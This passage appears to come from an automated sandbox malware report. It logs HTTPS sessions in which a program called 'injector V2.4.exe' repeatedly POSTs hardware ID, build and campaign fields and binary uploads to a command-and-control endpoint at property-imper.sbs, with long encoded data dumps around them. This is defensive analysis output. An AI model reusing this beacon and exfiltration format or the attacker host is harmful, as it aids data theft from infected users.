                                                                                  Data Ascii: 4e1Fazs53w1WCmhoTKVBr4YR7oKb6yLUYhZP+cHym/nOEdujprFRgF0C9LEEK9yzG0iligOyKlr7jhTlGLmTZFVZS/KjYsPUHQLxNkQr13FOiLUKFWO7jvqOFOFZqEAl1QkfcCLjxlWPEjNzFfwY99yKdNnB8Gpfao8RcU96CKCTCZYzZ+MXkh0UoPEXLc8nHki2GYJyOA54DFbhGOgH45eL33OiI4TXyhFx8tc9mnfOmuYbxWOsXO5CV6UdL
                                                                                  2024-11-23 13:11:14 UTC908INData Raw: 4f 69 49 73 66 57 6a 70 5a 79 38 68 62 38 6e 62 58 63 79 6a 56 61 41 44 45 35 6a 44 71 50 46 65 50 61 71 49 4a 69 46 63 6a 64 38 37 4f 79 31 35 51 49 67 75 62 67 33 50 79 64 4e 74 32 4d 35 70 53 54 64 47 6e 4b 71 6f 38 55 63 55 39 36 41 57 41 57 53 5a 38 77 59 32 4e 46 55 55 36 57 63 58 4f 56 65 56 69 32 58 51 76 32 33 6f 48 77 4f 38 77 34 7a 42 55 67 47 4b 73 54 63 73 61 49 6d 2b 4f 31 73 55 2f 57 6a 46 48 79 64 52 51 74 33 75 53 59 32 58 66 5a 45 32 57 71 54 66 72 50 31 79 42 61 36 59 4a 69 56 77 72 65 73 47 49 6a 78 35 51 4d 45 50 4c 77 6c 33 38 61 39 78 2f 4b 4e 78 75 41 63 2f 73 63 36 52 37 57 70 30 6c 38 45 32 72 58 53 5a 6c 6a 4c 75 47 45 46 6b 39 58 59 50 63 48 75 34 6b 32 33 5a 6c 67 43 67 44 79 2b 59 68 36 79 6c 59 69 33 65 6b 43 49 4e 58 4a 6e
                                                                                  Data Ascii: OiIsfWjpZy8hb8nbXcyjVaADE5jDqPFePaqIJiFcjd87Oy15QIgubg3PydNt2M5pSTdGnKqo8UcU96AWAWSZ8wY2NFUU6WcXOVeVi2XQv23oHwO8w4zBUgGKsTcsaIm+O1sU/WjFHydRQt3uSY2XfZE2WqTfrP1yBa6YJiVwresGIjx5QMEPLwl38a9x/KNxuAc/sc6R7Wp0l8E2rXSZljLuGEFk9XYPcHu4k23ZlgCgDy+Yh6ylYi3ekCINXJn
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 33 66 38 62 0d 0a 73 70 43 2f 57 6a 53 61 43 6a 53 62 51 50 43 37 44 7a 71 4f 6c 79 4c 62 36 4e 4e 79 78 6f 69 62 34 37 57 78 54 46 61 4b 6c 6e 4a 79 45 47 31 55 64 39 30 4b 39 39 2b 54 64 47 6e 4b 71 6f 38 55 63 55 39 36 41 61 44 56 69 6c 33 79 4a 79 4c 45 55 55 77 57 63 66 4e 56 50 74 71 31 58 63 71 33 58 6f 4a 7a 76 73 79 37 7a 78 54 69 48 65 74 54 63 73 61 49 6d 2b 4f 31 73 55 6b 59 7a 31 62 30 73 51 53 77 6d 66 53 64 43 4c 4f 4b 42 4b 41 38 48 50 74 4e 78 33 64 4a 61 73 42 69 46 4d 67 65 4e 79 45 69 52 39 46 50 55 4c 4b 79 56 48 35 61 39 64 32 49 4d 70 6a 41 73 62 6d 4d 75 63 32 56 6f 46 6c 36 45 50 46 58 54 30 33 6c 73 36 6b 45 31 67 6f 53 4e 4b 42 5a 66 52 71 30 6e 30 7a 6d 48 64 44 31 36 6b 30 35 6e 73 46 78 57 53 6b 41 59 52 56 49 33 33 47 6a 59
                                                                                  Data Ascii: 3f8bspC/WjSaCjSbQPC7DzqOlyLb6NNyxoib47WxTFaKlnJyEG1Ud90K99+TdGnKqo8UcU96AaDVil3yJyLEUUwWcfNVPtq1Xcq3XoJzvsy7zxTiHetTcsaIm+O1sUkYz1b0sQSwmfSdCLOKBKA8HPtNx3dJasBiFMgeNyEiR9FPULKyVH5a9d2IMpjAsbmMuc2VoFl6EPFXT03ls6kE1goSNKBZfRq0n0zmHdD16k05nsFxWSkAYRVI33GjY
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 53 38 37 49 58 76 6c 74 30 48 49 70 33 33 6f 41 79 2b 45 35 34 7a 35 52 69 47 61 36 44 6f 51 61 61 7a 66 4a 6c 73 56 47 46 78 31 34 39 4f 41 51 36 43 72 46 4f 69 4c 55 4b 46 57 4f 36 44 76 74 4e 56 6d 58 61 37 6f 44 67 6c 6f 6a 66 38 61 4a 69 52 42 5a 4b 45 50 43 77 31 37 34 62 4e 56 2b 4a 4e 78 73 41 63 6d 70 66 61 6f 38 52 63 55 39 36 43 57 47 51 44 38 31 34 49 57 46 47 55 63 73 55 49 50 63 48 75 34 6b 32 33 5a 6c 67 43 67 4a 78 65 4d 36 36 54 4a 5a 69 47 57 68 41 6f 78 53 4b 48 2f 63 6a 34 38 4d 55 7a 39 4b 7a 4d 6c 55 2f 32 6a 54 64 69 48 4b 59 30 32 41 71 54 54 79 65 77 58 46 52 61 4d 62 70 6b 67 33 4e 39 48 41 6e 46 35 51 4e 67 75 62 67 31 6e 37 5a 64 31 77 49 39 4e 74 41 4d 37 73 4f 65 30 33 58 59 56 6d 72 67 75 49 55 69 31 37 77 6f 32 49 47 31 4d
                                                                                  Data Ascii: S87IXvlt0HIp33oAy+E54z5RiGa6DoQaazfJlsVGFx149OAQ6CrFOiLUKFWO6DvtNVmXa7oDglojf8aJiRBZKEPCw174bNV+JNxsAcmpfao8RcU96CWGQD814IWFGUcsUIPcHu4k23ZlgCgJxeM66TJZiGWhAoxSKH/cj48MUz9KzMlU/2jTdiHKY02AqTTyewXFRaMbpkg3N9HAnF5QNgubg1n7Zd1wI9NtAM7sOe03XYVmrguIUi17wo2IG1M
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 56 48 78 61 4e 45 36 61 35 68 76 46 59 36 78 63 38 30 68 55 49 4e 79 75 54 69 43 57 6e 51 33 30 63 43 63 58 6c 41 32 43 35 75 44 58 66 74 75 30 58 38 68 30 47 38 4f 7a 2b 55 33 35 7a 5a 5a 6a 47 47 74 48 35 64 63 4b 33 66 42 67 49 6f 53 52 54 52 4f 77 38 38 51 75 53 54 62 59 6d 57 41 4b 44 7a 5a 36 58 50 31 64 55 54 46 59 71 52 4e 33 52 6f 71 65 74 79 43 69 68 35 57 4f 55 2f 49 78 46 62 78 5a 64 39 2f 4a 74 31 75 44 4d 37 6c 4f 65 30 7a 56 34 74 6f 72 67 6d 44 58 47 55 35 6a 6f 6d 64 58 67 39 36 65 63 37 4e 57 66 52 69 30 57 77 4e 36 53 67 53 67 50 42 7a 37 54 63 64 33 53 57 73 42 6f 31 57 49 48 2f 4c 6a 34 30 55 58 7a 56 45 30 63 4a 66 2f 6d 50 58 64 79 72 57 62 51 50 63 37 6a 6a 68 4d 31 53 4c 59 2b 68 44 78 56 30 39 4e 35 62 4f 73 78 31 5a 4d 56 72 4d
                                                                                  Data Ascii: VHxaNE6a5hvFY6xc80hUINyuTiCWnQ30cCcXlA2C5uDXftu0X8h0G8Oz+U35zZZjGGtH5dcK3fBgIoSRTROw88QuSTbYmWAKDzZ6XP1dUTFYqRN3RoqetyCih5WOU/IxFbxZd9/Jt1uDM7lOe0zV4torgmDXGU5jomdXg96ec7NWfRi0WwN6SgSgPBz7Tcd3SWsBo1WIH/Lj40UXzVE0cJf/mPXdyrWbQPc7jjhM1SLY+hDxV09N5bOsx1ZMVrM
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 58 54 4f 6d 75 59 62 78 57 4f 73 58 50 62 4c 56 71 43 61 75 6f 6b 67 6b 45 6b 66 63 32 46 69 56 35 49 64 46 4b 44 78 46 79 33 50 4a 78 33 4b 64 56 73 48 38 4c 70 4d 2b 4d 38 56 35 64 71 70 77 43 47 57 69 42 6c 7a 35 79 4b 46 56 49 35 54 38 7a 4d 58 50 39 75 6e 44 52 6c 33 33 42 4e 6c 71 6b 66 36 53 70 58 78 30 4b 79 47 34 4a 57 4e 48 7a 44 67 73 55 42 47 53 4d 4c 78 4d 38 51 72 79 54 63 65 79 6a 4b 62 51 7a 45 34 7a 37 69 4e 46 69 41 61 71 77 4a 6a 6c 51 33 65 63 47 4f 67 78 56 57 50 30 6a 49 79 56 37 2b 64 70 77 30 5a 64 39 77 54 5a 61 70 47 66 45 36 55 49 6b 6e 68 67 61 54 58 57 64 57 77 49 57 43 45 6b 46 36 56 49 33 61 45 50 42 6f 6e 43 4a 6c 30 57 59 42 7a 65 34 37 34 6a 35 64 6a 6d 57 6e 42 34 74 64 4e 33 33 43 68 4a 63 52 56 44 64 50 7a 73 6c 56 2f
                                                                                  Data Ascii: XTOmuYbxWOsXPbLVqCauokgkEkfc2FiV5IdFKDxFy3PJx3KdVsH8LpM+M8V5dqpwCGWiBlz5yKFVI5T8zMXP9unDRl33BNlqkf6SpXx0KyG4JWNHzDgsUBGSMLxM8QryTceyjKbQzE4z7iNFiAaqwJjlQ3ecGOgxVWP0jIyV7+dpw0Zd9wTZapGfE6UIknhgaTXWdWwIWCEkF6VI3aEPBonCJl0WYBze474j5djmWnB4tdN33ChJcRVDdPzslV/
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 6c 67 43 67 4e 79 75 55 77 37 54 56 53 69 47 71 76 42 6f 70 51 4b 32 58 42 69 34 30 53 58 7a 64 5a 79 63 6c 43 2f 6d 33 52 64 43 33 4b 61 30 32 41 71 54 54 79 65 77 58 46 56 36 49 4f 69 55 77 6f 65 49 36 52 79 77 63 58 50 55 65 44 6d 78 44 6c 64 74 78 78 4a 64 39 6d 48 38 2f 68 50 4f 41 37 57 34 35 76 71 77 53 42 56 43 78 78 7a 34 4f 45 48 31 63 2f 53 38 72 52 58 62 63 71 6e 48 30 39 6d 44 42 4e 2b 65 55 34 32 7a 68 4c 78 58 72 6d 46 4d 56 64 4b 54 65 57 7a 6f 51 4d 57 6a 4a 50 77 38 35 57 2f 47 58 64 65 53 58 59 61 77 33 4c 34 6a 7a 73 50 46 43 50 62 4b 45 66 6a 56 34 33 64 38 4b 4b 78 56 41 58 50 56 4f 44 6d 78 44 48 5a 39 64 32 4a 64 56 39 54 64 47 6e 4b 71 6f 38 55 63 55 39 36 41 57 4f 55 53 4e 38 7a 59 32 4c 46 56 30 31 52 4d 6e 46 56 76 39 68 33 48
                                                                                  Data Ascii: lgCgNyuUw7TVSiGqvBopQK2XBi40SXzdZyclC/m3RdC3Ka02AqTTyewXFV6IOiUwoeI6RywcXPUeDmxDldtxxJd9mH8/hPOA7W45vqwSBVCxxz4OEH1c/S8rRXbcqnH09mDBN+eU42zhLxXrmFMVdKTeWzoQMWjJPw85W/GXdeSXYaw3L4jzsPFCPbKEfjV43d8KKxVAXPVODmxDHZ9d2JdV9TdGnKqo8UcU96AWOUSN8zY2LFV01RMnFVv9h3H
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 44 4d 50 35 4e 4b 70 31 48 59 4d 6c 38 46 33 4c 47 69 46 6d 6a 74 62 56 54 41 78 76 47 4a 53 54 41 75 67 71 78 54 6f 7a 6d 44 42 66 67 4b 6b 68 71 6d 4d 64 77 6d 61 36 48 34 4e 5a 4d 33 53 4a 73 4c 73 2b 58 44 5a 49 7a 38 4a 58 74 79 71 63 64 57 57 41 55 55 33 4e 2b 79 47 6c 4b 6b 75 49 64 61 39 42 6a 55 73 6f 65 34 37 41 78 56 4a 54 4d 55 66 47 78 45 43 34 64 73 78 78 4b 63 34 6b 43 64 79 70 66 61 6f 71 56 6f 70 33 70 67 72 4b 53 7a 4e 36 33 6f 32 41 47 52 73 79 57 73 37 50 45 4c 6b 6b 79 58 45 70 33 6d 55 59 67 66 67 6c 36 53 31 61 79 57 32 35 41 49 6b 61 47 6a 6d 4f 6c 73 56 47 46 77 39 49 7a 63 31 58 34 58 57 52 57 69 37 55 61 77 48 50 37 6e 4f 6b 65 31 76 46 50 66 74 44 78 56 34 30 4e 35 62 65 31 30 55 43 61 52 79 54 6b 55 2b 35 66 5a 78 73 5a 59 41
                                                                                  Data Ascii: DMP5NKp1HYMl8F3LGiFmjtbVTAxvGJSTAugqxTozmDBfgKkhqmMdwma6H4NZM3SJsLs+XDZIz8JXtyqcdWWAUU3N+yGlKkuIda9BjUsoe47AxVJTMUfGxEC4dsxxKc4kCdypfaoqVop3pgrKSzN63o2AGRsyWs7PELkkyXEp3mUYgfgl6S1ayW25AIkaGjmOlsVGFw9Izc1X4XWRWi7UawHP7nOke1vFPftDxV40N5be10UCaRyTkU+5fZxsZYA
                                                                                  2024-11-23 13:11:14 UTC1369INData Raw: 53 47 71 59 78 33 43 61 36 55 4d 68 6c 51 6d 5a 64 79 49 68 67 68 55 66 58 58 39 35 6c 33 36 59 64 4a 39 47 2b 5a 4a 42 39 37 6b 50 4f 30 46 59 37 4a 30 72 78 33 48 66 43 5a 68 7a 63 37 4c 58 6b 39 36 45 34 50 69 57 75 64 70 30 33 31 6c 6c 69 67 4a 6a 72 46 7a 7a 7a 5a 51 67 47 75 76 54 36 52 51 4e 58 72 42 69 63 56 51 46 7a 59 4c 6d 34 4e 52 2f 58 54 52 64 53 4b 55 62 78 66 4a 71 58 32 71 4e 52 33 64 4a 61 6b 48 6c 56 63 71 63 49 4b 49 69 78 41 58 4a 51 58 61 67 30 61 33 50 49 38 30 5a 63 6f 6f 56 59 36 75 50 65 63 36 58 6f 74 6d 75 68 2b 44 57 54 4e 30 69 62 43 37 4f 31 6f 33 54 73 33 45 62 73 6c 46 31 6d 6f 6f 31 32 39 50 37 75 34 6c 36 51 56 6a 73 6e 53 76 48 63 64 38 4a 6d 48 4e 7a 73 74 65 54 33 6f 54 67 2b 4a 61 35 32 6e 54 66 57 66 34 62 78 76 4e
                                                                                  Data Ascii: SGqYx3Ca6UMhlQmZdyIhghUfXX95l36YdJ9G+ZJB97kPO0FY7J0rx3HfCZhzc7LXk96E4PiWudp031lligJjrFzzzZQgGuvT6RQNXrBicVQFzYLm4NR/XTRdSKUbxfJqX2qNR3dJakHlVcqcIKIixAXJQXag0a3PI80ZcooVY6uPec6Xotmuh+DWTN0ibC7O1o3Ts3EbslF1moo129P7u4l6QVjsnSvHcd8JmHNzsteT3oTg+Ja52nTfWf4bxvN


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549706104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:16 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=HFRS7G1FUA8RE
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12810
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:16 UTC12810OUTData Raw: 2d 2d 48 46 52 53 37 47 31 46 55 41 38 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 48 46 52 53 37 47 31 46 55 41 38 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 46 52 53 37 47 31 46 55 41 38 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 32 38 35 30 32 35 37 30 35 0d 0a 2d 2d 48 46 52 53 37 47
                                                                                  Data Ascii: --HFRS7G1FUA8REContent-Disposition: form-data; name="hwid"C16B99DACE32E567C8852029FBE145BA--HFRS7G1FUA8REContent-Disposition: form-data; name="pid"2--HFRS7G1FUA8REContent-Disposition: form-data; name="lid"yau6Na--1285025705--HFRS7G
                                                                                  2024-11-23 13:11:16 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=tkvucbdp54rb8tholkb7abrdnk; expires=Wed, 19-Mar-2025 06:57:55 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YAWsOa2vc938UuQNKjTMNeRxy%2FCRuex92zqPbAk1sIKLJrEKchCqm7UcKrQomE7zsouHFscG1X6Zx1qRfoY2dgAT8xbW0YFCwpAhB49P%2FYDorU1OzkLObWZQ%2FfO5xQoANGgd7OY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e71677799e3420d-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1609&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13747&delivery_rate=1781574&cwnd=242&unsent_bytes=0&cid=1498af8fa42aecf2&ts=751&x=0"
                                                                                  2024-11-23 13:11:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 13:11:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549707104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:18 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=69CXXKCM4XW3VKJ8X0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15082
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:18 UTC15082OUTData Raw: 2d 2d 36 39 43 58 58 4b 43 4d 34 58 57 33 56 4b 4a 38 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 36 39 43 58 58 4b 43 4d 34 58 57 33 56 4b 4a 38 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 39 43 58 58 4b 43 4d 34 58 57 33 56 4b 4a 38 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 32 38 35 30
                                                                                  Data Ascii: --69CXXKCM4XW3VKJ8X0Content-Disposition: form-data; name="hwid"C16B99DACE32E567C8852029FBE145BA--69CXXKCM4XW3VKJ8X0Content-Disposition: form-data; name="pid"2--69CXXKCM4XW3VKJ8X0Content-Disposition: form-data; name="lid"yau6Na--12850
                                                                                  2024-11-23 13:11:19 UTC1013INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=7tp1jn7qnlealirr6tian6akhi; expires=Wed, 19-Mar-2025 06:57:57 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVMNFVb0Mqxq1KAGJ3DI2ogQYUOKIbg2UjANt5YINExUCmEz5TW0hPYTHE64C8etHxtUe1ni3X4JmbILmTBzREOB1ffH%2BqVnZs9A074UHQOYtBOQHZELuYSZwMSPlbdAhtGOdYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e7167848aae8c5f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1821&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=1583514&cwnd=181&unsent_bytes=0&cid=81f8b82e6d663ec2&ts=773&x=0"
                                                                                  2024-11-23 13:11:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 13:11:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549708104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:20 UTC285OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=TU3BSQD1V57Y1SYAPT6
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20578
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:20 UTC15331OUTData Raw: 2d 2d 54 55 33 42 53 51 44 31 56 35 37 59 31 53 59 41 50 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 54 55 33 42 53 51 44 31 56 35 37 59 31 53 59 41 50 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 55 33 42 53 51 44 31 56 35 37 59 31 53 59 41 50 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 32
                                                                                  Data Ascii: --TU3BSQD1V57Y1SYAPT6Content-Disposition: form-data; name="hwid"C16B99DACE32E567C8852029FBE145BA--TU3BSQD1V57Y1SYAPT6Content-Disposition: form-data; name="pid"3--TU3BSQD1V57Y1SYAPT6Content-Disposition: form-data; name="lid"yau6Na--12
                                                                                  2024-11-23 13:11:20 UTC5247OUTData Raw: 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: fBZ>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                  2024-11-23 13:11:21 UTC1015INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=loc6kpntm6bniha6rlhse8injd; expires=Wed, 19-Mar-2025 06:58:00 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gswMSCEBmh3bjKio7m13cAoiNLD9pkwluN7Z8eWWOifLgCXBN3KVO25OXkHk7l06OVdWI%2BpL5UwCxzrvk1ecHTeUW2r2yQc%2FKSlUpDCYh20GgMmWoZVZ6q7VRudSXc9Aeu7PDHU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e7167923c064345-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1679&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21543&delivery_rate=1572428&cwnd=211&unsent_bytes=0&cid=e2b917ae16e0f037&ts=897&x=0"
                                                                                  2024-11-23 13:11:21 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 13:11:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549709104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:23 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=OCZ8RMO9L20OK5
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1251
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:23 UTC1251OUTData Raw: 2d 2d 4f 43 5a 38 52 4d 4f 39 4c 32 30 4f 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 4f 43 5a 38 52 4d 4f 39 4c 32 30 4f 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 43 5a 38 52 4d 4f 39 4c 32 30 4f 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 32 38 35 30 32 35 37 30 35 0d 0a 2d 2d 4f 43 5a
                                                                                  Data Ascii: --OCZ8RMO9L20OK5Content-Disposition: form-data; name="hwid"C16B99DACE32E567C8852029FBE145BA--OCZ8RMO9L20OK5Content-Disposition: form-data; name="pid"1--OCZ8RMO9L20OK5Content-Disposition: form-data; name="lid"yau6Na--1285025705--OCZ
                                                                                  2024-11-23 13:11:23 UTC1022INHTTP/1.1 200 OK
